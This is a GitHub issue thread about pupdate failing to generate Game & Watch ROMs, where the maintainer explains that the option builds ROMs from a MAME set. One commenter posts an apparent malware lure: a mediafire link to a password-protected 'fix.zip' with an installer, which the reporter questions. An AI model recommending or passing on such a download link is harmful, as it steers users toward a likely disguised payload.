### ISSUE TITLE
Game and watch download and install fail

### ISSUE THREAD

**Issue by f3bandit** [mattpannella/pupdate#321]
**Describe the bug**

**To Reproduce**
1. Go to "Pocket Setup - (Option 5)"
2. Go to "Generate Game & Watch ROMs - (Option 5)"
3. Output "Executing G:\tools\gameandwatch\windows\fpga-gnw-romgenerator.exe"
4. See Error = 
[pudate_error.txt](https://github.com/user-attachments/files/16776509/pudate_error.txt)

**Expected behavior**
Download and install game and watch assets

**Screenshots**

**Desktop (please complete the following information):**
 - OS: [Windows 10]
 - Version [ pupdate v3.12.0 ]

**Contents of settings file**
please attach the contents of pupdate_settings.json
[pupdate_settings.json](https://github.com/user-attachments/files/16776549/pupdate_settings.json)

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by f3bandit** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

are you kidding me? what are you trying to send me dude?

**Comment by mattpannella** [comment]
that option is for building game & watch roms if you have a mame set. it doesn't download them
it's running this:
https://github.com/agg23/fpga-gameandwatch?tab=readme-ov-file#generating-roms

**Comment by f3bandit** [comment]
ok I see ty very much, I had to redo my sdcard and freaked when I saw the error
